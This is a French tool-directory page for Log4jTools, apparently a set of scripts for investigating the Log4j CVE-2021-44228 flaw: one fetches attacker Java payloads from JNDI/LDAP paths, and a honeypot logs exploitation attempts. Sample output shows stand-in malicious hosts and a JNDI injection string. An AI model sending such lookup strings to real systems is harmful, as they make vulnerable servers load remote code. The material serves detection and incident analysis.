Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Log4jTools — Outils d'investigation pour Log4j CVE-2021-44228 | Kitploit
Outils/GitHubGitHub/malwaretech/log4jtools
Génération de PayloadsAnalyse des VulnérabilitésExploitationCollecte d'InformationsDétection d'Intrusion
GitHubmalwaretech/log4jtools

Log4jTools

Outils d'investigation pour Log4j CVE-2021-44228

Voir le dépôt
941244il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Log4jTools

Outils pour enquêter sur la CVE-2021-44228 de Log4j

Explication du bug et démo

https://www.youtube.com/watch?v=0-abhd-CLwQ

FetchPayload.py (Obtenir la charge utile java à partir du chemin ldap fourni dans la recherche JNDI).

Prérequis: curl (système), requests (python)

Exemple de commande:

python FetchPayload.py ldap://maliciouserver:1337/path

[+] getting object from ldap://maliciouserver:1337/path
[+] exploit payload: http://maliciouserver:80/Exploit.class
[+] seeing if attacker left behind un-compile payload http://maliciouserver:80/Exploit.java
[x] failed to find payload Exploit.java
[+] trying to fetch compiled payload http://maliciouserver:80/Exploit.class
[+] found payload and saved to file Exploit.class_

SimpleHoneypot.py (pot de miel pour détecter les tentatives d'exploitation basées sur la présence de '${' ).

Prérequis: python3, asyncore

Exemple de commande:

python3 SimpleHoneypot.py

[2021-12-09 13:00:00,000] Possible CVE-2021-44228 Attempt: 127.0.0.1:1111 -> port 8080 - GET /?id=${jdni:ldap://127.0.0.1:1389/hax} HTTP/1.1
Télécharger l’outil